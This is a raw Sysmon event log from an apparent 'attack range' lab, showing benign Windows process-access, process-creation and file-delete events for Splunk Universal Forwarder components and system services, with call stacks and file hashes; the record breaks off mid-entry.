12:24:29.799{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017147Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:29.799{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017146Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:29.799{E5A8D418-DC43-63C7-0500-00000000B002}416432C:\Windows\system32\csrss.exe{E5A8D418-E4FD-63C7-1202-00000000B002}712C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000017145Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:29.799{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E4FD-63C7-1202-00000000B002}712C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000017144Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:29.800{E5A8D418-E4FD-63C7-1202-00000000B002}712C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.2.5Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=611F936426EC989CDC9FB43B692D3CFA,SHA256=AF94FF9B82C4BF6F27A5695E741D2BDF06A6A574924179D0BC9E7B8A725882F5,IMPHASH=A2763C4BA6D4717F662584401724A6B2{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000044478Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:29.983{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6BD757324CD6B8BB3882D0D7ACE3121A,SHA256=385CAB67D7A0CF388D51156A5F45878E6FA8D537A66780571E4E054115E2BB49,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000044477Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:29.857{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=24C9DB2977F2CDE8D81E206EE0C2F3AD,SHA256=B46EF5A27D5B81C15E6DA3A37929EE8DA3EC78D0FC34561CF7D2F80C91A7C6C9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000044476Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:29.802{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E4FD-63C7-5906-00000000AF02}5404C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044475Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:29.802{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044474Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:29.802{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044473Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:29.802{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044472Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:29.802{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044471Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:29.802{FE4C2B44-D9F3-63C7-0500-00000000AF02}4082524C:\Windows\system32\csrss.exe{FE4C2B44-E4FD-63C7-5906-00000000AF02}5404C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000044470Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:29.802{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E4FD-63C7-5906-00000000AF02}5404C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000044469Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:29.803{FE4C2B44-E4FD-63C7-5906-00000000AF02}5404C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.2.5Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=92BD3C71158FA8B9A0821D43564A56E7,SHA256=7850C91F8D08679D7A0579D350C08CA6F6EDEA8A12226ADC2E30B4ABF8CE0BE2,IMPHASH=FD2D4472615B421BAEF1D51F46EF5F52{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000044468Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:29.571{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C26F15C0E0105774F72C39F9A3F9EA8,SHA256=BC41B28CB40366A16A33DCBAF037D226425E519767493E5732623275DF1970F0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017143Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:29.587{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=276EB7C14514AF00869A8582BBAF42E8,SHA256=510E51C1997E766B9FECC83C6E3DEECA57D11B20DB5B68110F7F6D0C48FE79F8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000017142Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:29.126{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E4FD-63C7-1102-00000000B002}2416C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017141Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:29.126{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017140Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:29.126{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017139Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:29.126{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017138Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:29.126{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017137Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:29.126{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017136Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:29.126{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017135Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:29.126{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017134Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:29.126{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017133Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:29.126{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017132Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:29.126{E5A8D418-DC43-63C7-0500-00000000B002}416432C:\Windows\system32\csrss.exe{E5A8D418-E4FD-63C7-1102-00000000B002}2416C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000017131Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:29.126{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E4FD-63C7-1102-00000000B002}2416C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program 